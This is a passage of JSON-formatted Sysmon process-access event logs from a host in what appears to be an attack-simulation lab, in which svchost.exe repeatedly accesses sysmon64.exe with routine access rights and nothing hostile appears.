C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:30.765","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:30","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3066,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:30.765\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:30.765","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:30","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3067,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:30.765\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:30.765","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:30","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3068,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:30.765\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:30.765","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:30","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3069,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:30.765\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:30.765","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:30","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3070,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:30.765\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:30.765","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:30","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3071,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:30.765\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:30.765","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:30","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3072,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:30.765\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:30.765","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:30","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3073,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:30.765\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 